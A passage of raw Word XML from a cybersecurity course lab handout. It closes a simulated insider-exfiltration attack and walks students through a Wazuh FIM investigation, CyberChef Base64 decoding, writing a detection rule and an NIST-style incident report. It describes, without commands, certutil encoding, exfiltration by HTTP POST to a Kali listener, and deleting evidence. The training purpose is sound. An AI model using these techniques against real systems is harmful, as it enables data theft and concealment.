        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This deletion will trigger a FIM deletion alert in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. The attacker assumes that deleting the files destroys the evidence. Your job in Phase Two is to prove that it does not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC4BEE" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Once you complete Step 4, close the PowerShell terminal and stop the Kali listener with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. Do not run any further commands that would add noise to the log. The cleaner the environment at this point, the cleaner your investigation will be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59D894" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D68DFE" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase Two: Blue Team Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19121627" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack is complete. Switch to your SOC analyst role. Everything you do from this point forward is investigative. You will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and your understanding of the attack sequence to build a complete picture of what happened. The commands are not provided for this phase. You have done the individual components of this work across Weeks 2 through 5. Apply that knowledge here against a single, real event sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03C303" w14:textId="77777777" w:rsidR="00AA7213" w:rsidRDefault="00AA7213">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EE7B8F" w14:textId="77777777" w:rsidR="00AA7213" w:rsidRDefault="00AA7213">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E89794" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1 — FIM Threat Hunting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270BF88F" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dashboard and navigate to the Discover tab. Your goal is to find the log events that prove each stage of the attack took place. You are looking for evidence of file creation, modification, and deletion within the C:\Espionage directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B6017" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start by filtering for the relevant FIM rule IDs. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule 550 fires on integrity checksum changes, which covers file creation and modification. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule 553 fires on file deletion. Filter your view to each of these rule IDs and identify the log events that correspond to the attacker's four steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2198A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>For each event you find, extract and document the following fields: the file path, the type of event, the exact timestamp, the agent that reported it, and any user context available. Build a timeline. Each log event should map to one of the four attack steps you executed in Phase One.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A8C0A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As you investigate, think about what the attacker expected. They deleted the files in Step 4. Why does that not destroy the evidence? What does </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> capture at the time of the event that persists even after the file is gone? The answer to that question is why FIM is a cornerstone of insider threat detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B2B5C" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deliverable: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Screenshots of the raw FIM log events in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, showing file creation and file deletion alerts with the full detail panel visible. Each screenshot should clearly show the file path, timestamp, and rule ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B2616" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2 — Decoding the Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416106A3" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A SOC analyst cannot stop at proving a file was created and deleted. They must prove what the file contained. This is where your Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener output becomes critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424883BD" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy the Base64 string that arrived in your Kali terminal during Step 3. Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at https://gchq.github.io/CyberChef/. Paste the encoded string and apply the From Base64 recipe to reveal the original plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2D268" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The decoded output is your primary piece of forensic evidence. It proves not just that data left the machine, but exactly what data. In a real investigation this is the difference between saying a data exfiltration occurred and proving what was taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EDD6F" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deliverable: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A screenshot of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> interface showing the Base64 input and the decoded output. The decoded client data must be clearly visible in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601DCB0" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3 — Detection Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C4552" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The final investigative task is to ensure this attack pattern can never pass through your environment silently again. The attacker used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a .b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>64 file extension to store the encoded payload. File creation with that extension inside a sensitive directory is not normal behaviour and should generate a specific, high-priority alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C3E84" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write a custom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule in your local_rules.xml file that does the following: fires when a file ending </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in .b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>64 is created or modified, restricts the match to the C:\Espionage directory, and generates a Level 10 alert. A Level 10 alert means a real-time notification in a production SOC. It should not be set lower than that for this type of activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77452A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Your rule must be written as valid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> XML with a rule ID above 100000. Assign it a meaningful description that would tell a SOC analyst exactly what fired and why. Attach the relevant MITRE ATT&amp;CK technique ID in the rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A535B8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After writing the rule, reload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Manager ruleset and confirm there are no XML parsing errors in the Manager log. If you want to test the rule, re-run Step 2 of the attack to create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the .b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>64 file again and verify your custom alert fires alongside the standard FIM alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020ACF68" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deliverable: </w:t>
      </w:r>
      <w:r>
        <w:t>The full XML of your custom rule, either pasted directly into your incident report or included as a separate file. The rule must be syntactically valid and include the rule ID, level, description, file match condition, and MITRE ATT&amp;CK mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C36A0C" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC84114" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase Three: Incident Response Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F756A44" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The incident response report is the final output of Week 6. It is where your technical findings are translated into professional documentation. In a real SOC environment this report would be read by the security manager, legal team, HR, and potentially law enforcement. It must be accurate, structured, and written clearly enough for both technical and non-technical audiences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A8FEA" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Structure your report using the NIST SP 800-61 incident response framework. The four sections below are required. Each section has specific content requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFDC5A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Section 1 — Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE52218" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Write a brief, non-technical summary of the incident. This section is for readers who will not read the rest of the report. It should answer four questions: What happened? When did it happen? What data was affected? What has been done about it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359AB71" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Keep this section to no more than half a page. Write it in plain language. Avoid technical terminology. If you use an acronym, spell it out the first time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212D4C8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Section 2 — Detection and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779E87A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>This is the technical core of the report. It must contain a complete, timestamped attack timeline mapping each step the attacker took to the corresponding log evidence and MITRE ATT&amp;CK technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD878D8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>You are working with four MITRE techniques. Map each one to the specific attack step it corresponds to and explain in one to two sentences what that technique involves and how the attacker used it in this scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0DF38" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1074 — Data Staged: </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker created Client_Database.txt in C:\Espionage before exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA03EC8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1027 — Obfuscated Files or Information: </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker used certutil.exe to encode the file as Base64 to disguise its content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41957DE2" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1048 — Exfiltration Over Alternative Protocol: </w:t>
      </w:r>
      <w:r>
        <w:t>The encoded data was pushed via HTTP POST to a listener on port 8080 rather than a standard exfiltration channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B316D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1070 — Indicator Removal: </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker deleted all files from C:\Espionage to destroy forensic evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73F2C6" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Embed your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FIM screenshots and your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> decoded output screenshot directly into this section as evidence. Each piece of evidence should be labelled with what it proves and how it was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35570A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Section 3 — Containment, Eradication, and Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5914EA" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>This section describes how a real security team would respond to a confirmed insider threat incident. You are not describing what you did in the lab. You are describing what should happen in a real enterprise environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53843FA1" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Address each of the three phases in sequence. For containment, describe the immediate steps to stop the threat from spreading. What do you do with the compromised account? What access does it retain? For eradication, describe how you verify the environment is clean. What do you check to confirm the attacker has not established persistence? For recovery, describe how the affected systems and accounts are returned to normal operation and what verification steps confirm the environment is safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389EF9D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Be specific. Do not write generic process steps. Describe what you would actually do for this specific scenario involving a compromised employee account, an encoded file staged on a Windows endpoint, and data sent to an internal machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA11A2" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Section 4 — Post-Incident Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56434526" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>This section covers two things: the custom detection rule you wrote in Phase Two, and the lessons learned from the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC09FB7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Include the complete XML of your custom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule and explain in plain language what it detects, why you set the severity level where you did, and how it improves your detection coverage beyond the default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ruleset. This is the documentation a detection engineer writes when handing a new rule to the operations team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC1250" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close with a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>short lessons</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> learned section. What gaps in visibility did this scenario expose? What would you configure differently in future? What monitoring capability, if it had been in place before the incident, would have detected the attack earlier?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77175104" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4B6DB4" w14:textId="77777777" w:rsidR="00AA7213" w:rsidRDefault="00AA7213">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607D1D07" w14:textId="77777777" w:rsidR="00AA7213" w:rsidRDefault="00AA7213">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548BEB02" w14:textId="07BC5E5F" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Submission Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C37C94" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compile your work into a single weekly report post on LinkedIn. Include all screenshots, the decoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output, and your full incident response report as part of the post or as an attached document. Tag </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyberster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and your assigned instructor. Add a short description of what the week covered and what you learned from running both sides of the engagement. Once published, share the link in your discussion group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648EECDD" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Make sure all steps are followed correctly. Incomplete submissions or missing tags may result in the task not being reviewed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21D5D7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>On writing quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F158719" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The incident response report is a professional document. It should read like one. Write in full sentences. Use past tense for what happened and present tense for your recommendations. Do not write it as a numbered walkthrough of steps you took. Write it as a structured analysis of an incident. Anyone in your organisation should be able to pick up this report and understand the sequence of events and the response taken without needing to ask you questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECBCCC" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3013BB79" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Common Issues and What to Watch For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000BD0E0" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>No FIM alerts appear after running the attack commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058D287" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are three things to check. First, confirm the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent was restarted after you edited </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to add the C:\Espionage directory. The new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration is not loaded until the agent service restarts. Second, confirm the directory path in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> matches exactly, including capitalisation. A path that does not match is silently ignored. Third, confirm the agent is showing as Active in the dashboard. A disconnected agent generates no alerts regardless of what happens on the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9164E1" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on Kali shows no data after the PowerShell exfiltration command</w:t>
      </w:r>
    </w:p>
